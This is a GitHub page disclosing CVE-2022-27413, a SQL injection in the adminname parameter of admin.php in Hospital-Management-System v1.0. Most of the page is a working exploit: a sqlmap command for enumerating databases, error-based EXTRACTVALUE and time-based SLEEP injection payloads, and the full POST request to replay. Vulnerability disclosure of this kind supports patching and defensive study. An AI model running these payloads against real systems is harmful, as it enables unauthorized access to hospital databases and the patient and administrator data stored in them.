Skip to content

HH1F/CVE-2022-27413

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
March 18, 2022 22:39

Hospital-Management-System v1.0 - SQLi

Vendor

image

Description:


The vulnerability page is admin.php

http://you ip/HMS/admin.php

Hospital-Management-System v1.0

The adminname parameter in the admin.php page appears to be vulnerable to SQL injection attacks.

[+]sqlmap:

python3 sqlmap.py -r Your post packet.txt --random-agent --risk=3 --level=3 -dbs

[+] Payloads:

Parameter: adminname ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: adminname=admin' AND EXTRACTVALUE(4756,CONCAT(0x5c,0x717a706a71,(SELECT (ELT(4756=4756,1))),0x7170707a71)) AND 'hOiE'='hOiE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: adminname=admin' AND (SELECT 3117 FROM (SELECT(SLEEP(5)))xtHJ) AND 'beHE'='beHE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
---

[+]Post request package

POST /HMS/admin.php HTTP/1.1
Host: 192.168.10.7
Content-Length: 119
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.10.7
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.10.7/HMS/admin.php
Accept-Language: zh-CN,zh;q=0.9
Connection: close

adminname=admin1&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4

In action:


image

Proof and Exploit:


href

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published